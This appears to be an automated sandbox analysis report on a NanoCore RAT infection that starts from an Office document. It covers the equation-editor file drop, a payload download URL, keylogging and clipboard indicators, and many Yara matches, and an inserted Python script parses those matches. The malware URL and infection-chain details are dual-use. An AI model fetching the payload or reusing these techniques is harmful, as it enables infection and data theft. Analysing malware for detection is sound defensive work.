Source: mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: mmuiqlcvwo.pif.4.dr String found in binary or memory: http://secure.globalsign.net/cacert/ObjectSign.crt09
Source: mmuiqlcvwo.pif.4.dr String found in binary or memory: http://secure.globalsign.net/cacert/PrimObject.crt0
Source: mmuiqlcvwo.pif, 00000005.00000002.666654547.0000000002F70000.00000002.00020000.sdmp, RegSvcs.exe, 00000006.00000002.667678750.0000000005C00000.00000002.00020000.sdmp, taskeng.exe, 00000009.00000002.666152649.0000000001C10000.00000002.00020000.sdmp, mmuiqlcvwo.pif, 0000000C.00000002.666694262.0000000003150000.00000002.00020000.sdmp String found in binary or memory: http://www.%s.comPA
Source: mmuiqlcvwo.pif.4.dr String found in binary or memory: http://www.autoitscript.com/autoit3/0
Source: mmuiqlcvwo.pif.4.dr String found in binary or memory: http://www.globalsign.net/repository/0
Source: mmuiqlcvwo.pif.4.dr String found in binary or memory: http://www.globalsign.net/repository/03
Source: mmuiqlcvwo.pif.4.dr String found in binary or memory: http://www.globalsign.net/repository09
Source: asdERTYgh56F[1].htm.2.dr String found in binary or memory: https://demopicking.renova-sa.net/asdERTYgh56F.exe
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F4E77D3E.emf
Source: unknown DNS traffic detected: queries for: demopicking.renova-sa.net
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FF2285 InternetQueryDataAvailable,InternetReadFile, 5_2_00FF2285
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to retrieve information about pressed keystrokes
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_01006308 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW, 5_2_01006308
Contains functionality for read data from the clipboard
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0100A0FC OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 5_2_0100A0FC
Contains functionality to read the clipboard data
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0101D91D OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard, 5_2_0101D91D
Installs a raw input device (often for capturing keystrokes)
Source: RegSvcs.exe, 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp Binary or memory string: RegisterRawInputDevices
Potential key logger detected (key state polling based)
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0102C7D6 SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 5_2_0102C7D6

E-Banking Fraud:

Yara detected Nanocore RAT
Source: Yara match (the same unpacked PE, memory dump and process memory sources listed under AV Detection above)

System Summary:

Malicious sample detected (through community Yara rule)
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.a30000.1.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.247e010.6.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3a5d828.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae0000.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.36e02a4.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.2.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.ae0000.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.26b4de0.2.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34ab46e.9.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3933240.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36e02a4.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.4.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.340000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.34b02a4.7.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 6.2.RegSvcs.exe.34b02a4.7.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3b23240.0.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.36db46e.5.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3c4d828.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
Source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
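The matches above are keyed by Joe Sandbox dump names, which pack the sandbox process index, base address and memory protection into the file name. The following Python, an added example and not part of the report or of Joe Sandbox's own tooling, parses those lines and collapses them into a per-process view: which rules hit, how often, and how many hits sit in RWX memory. The field layout of the .sdmp and .unpack names is inferred from the names in this report and is an assumption; the PAGE_* values are the winnt.h memory-protection constants.

```python
import re
from collections import defaultdict

# Added example, not report code. Field meanings of the .sdmp / .unpack names
# are inferred from the naming pattern in this report and are assumptions:
#   <proc idx hex>.<dump kind>.<dump id>.<base addr>.<protection>.<mem type>.sdmp
#   <proc idx>.<dump kind>.<process name>.<addr>.<n>[.raw].unpack
# The PAGE_* values are the winnt.h memory protection constants.
PAGE_PROTECTION = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                   0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}

LINE_RE = re.compile(
    r"^Source: (?:Yara match File source: )?(?P<src>.+?), type: (?P<type>\w+)"
    r"(?: Matched rule: (?P<rule>.+))?$")
SDMP_RE = re.compile(
    r"^(?P<idx>[0-9A-F]{8})\.[0-9A-F]{8}\.\d+\.[0-9A-F]{16}\.(?P<prot>[0-9A-F]{8})"
    r"\.[0-9A-F]{8}\.sdmp$", re.I)
UNPACK_RE = re.compile(
    r"^(?P<idx>\d+)\.\d+\.(?P<name>.+?)\.[0-9a-f]+\.\d+\.(?:raw\.)?unpack$")
PROCMEM_RE = re.compile(r"^Process Memory Space: (?P<name>.+?) PID: (?P<pid>\d+)$")


def rule_name(rule_field):
    """Reduce the 'Matched rule' text to the rule identifier.

    The report prints rules two ways: 'NanoCore Author: Kevin Breen <...>'
    and 'Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = ..., author = ...'.
    """
    if rule_field is None:
        return None
    if " Author: " in rule_field:
        return rule_field.split(" Author: ", 1)[0]
    return rule_field.split(" ", 1)[0]


def parse_line(line):
    """Return a record for one 'Source:' line, or None if it is not one."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    src = m.group("src")
    rec = {"type": m.group("type"), "rule": rule_name(m.group("rule")),
           "process": None, "name": None, "pid": None, "protection": None}
    s, u, p = SDMP_RE.match(src), UNPACK_RE.match(src), PROCMEM_RE.match(src)
    if s:
        rec["process"] = int(s.group("idx"), 16)
        prot = int(s.group("prot"), 16)
        rec["protection"] = PAGE_PROTECTION.get(prot, hex(prot))
    elif u:
        rec["process"] = int(u.group("idx"))
        rec["name"] = u.group("name")
    elif p:
        rec["name"] = p.group("name")
        rec["pid"] = int(p.group("pid"))
    else:
        return None
    return rec


def summarize(lines):
    """Group matches per sandbox process index (or OS PID for MEMORYSTR hits)."""
    out = defaultdict(lambda: {"names": set(), "rules": set(),
                               "matches": 0, "rwx_dumps": 0})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        key = f"pid:{rec['pid']}" if rec["pid"] is not None else f"idx:{rec['process']}"
        entry = out[key]
        if rec["name"]:
            entry["names"].add(rec["name"])
        if rec["rule"]:
            entry["rules"].add(rec["rule"])
            entry["matches"] += 1
        # RWX private memory holding a RAT body is the injection footprint.
        if rec["protection"] == "PAGE_EXECUTE_READWRITE":
            entry["rwx_dumps"] += 1
    return dict(out)


# Lines copied from this report.
SAMPLE_LINES = [
    "Source: Yara match File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY",
    "Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth",
    "Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>",
    "Source: 6.2.RegSvcs.exe.ae4629.3.raw.unpack, type: UNPACKEDPE Matched rule: Detetcs the Nanocore RAT Author: Florian Roth",
    "Source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>",
    "Source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY Matched rule: Detetcs the Nanocore RAT Author: Florian Roth",
    "Source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>",
    "Source: 5.3.mmuiqlcvwo.pif.3a5d828.1.unpack, type: UNPACKEDPE Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT",
]

if __name__ == "__main__":
    for key, entry in sorted(summarize(SAMPLE_LINES).items()):
        print(key, sorted(entry["names"]), sorted(entry["rules"]),
              entry["matches"], entry["rwx_dumps"])
```

The report does not state which sandbox process index corresponds to which OS PID, so the summary keeps MEMORYSTR hits (keyed by PID) separate from dump hits (keyed by index) rather than guessing the mapping.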
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Source: Screenshot number: 4 Screenshot OCR: enable Editing and Content from the Yellow bar 18 above to view locked content. 19 20 21 22
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\asdERTYgh56F[1].exe
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027626D 4_2_0027626D
Source: C:\Users\Public\vbc.exe Code function: 4_2_002683C0 4_2_002683C0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0028C0B0 4_2_0028C0B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_002630FC 4_2_002630FC
Source: C:\Users\Public\vbc.exe Code function: 4_2_00280113 4_2_00280113
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027F3CA 4_2_0027F3CA
Source: C:\Users\Public\vbc.exe Code function: 4_2_002733D3 4_2_002733D3
Source: C:\Users\Public\vbc.exe Code function: 4_2_0026E510 4_2_0026E510
Source: C:\Users\Public\vbc.exe Code function: 4_2_00280548 4_2_00280548
Source: C:\Users\Public\vbc.exe Code function: 4_2_0028C55E 4_2_0028C55E
Source: C:\Users\Public\vbc.exe Code function: 4_2_0026F5C5 4_2_0026F5C5
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027364E 4_2_0027364E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00290654 4_2_00290654
Source: C:\Users\Public\vbc.exe Code function: 4_2_002766A2 4_2_002766A2
Source: C:\Users\Public\vbc.exe Code function: 4_2_00262692 4_2_00262692
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027589E 4_2_0027589E
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027F8C6 4_2_0027F8C6
Source: C:\Users\Public\vbc.exe Code function: 4_2_0026E973 4_2_0026E973
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027397F 4_2_0027397F
Source: C:\Users\Public\vbc.exe Code function: 4_2_0026BAD1 4_2_0026BAD1
Source: C:\Users\Public\vbc.exe Code function: 4_2_0026DADD 4_2_0026DADD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00283CBA 4_2_00283CBA
Source: C:\Users\Public\vbc.exe Code function: 4_2_0027FCDE 4_2_0027FCDE
Source: C:\Users\Public\vbc.exe Code function: 4_2_00276CDB 4_2_00276CDB
Source: C:\Users\Public\vbc.exe Code function: 4_2_00265D7E 4_2_00265D7E
Source: C:\Users\Public\vbc.exe Code function: 4_2_00263EAD 4_2_00263EAD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00283EE9 4_2_00283EE9
Source: C:\Users\Public\vbc.exe Code function: 4_2_0026DF12 4_2_0026DF12
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FB35F0 5_2_00FB35F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FB98F0 5_2_00FB98F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FC2136 5_2_00FC2136
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FCA137 5_2_00FCA137
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FD427D 5_2_00FD427D
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FFF3A6 5_2_00FFF3A6
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FB98F0 5_2_00FB98F0
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FF655F 5_2_00FF655F
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FC2508 5_2_00FC2508
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FBF730 5_2_00FBF730
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_00FC3721 5_2_00FC3721
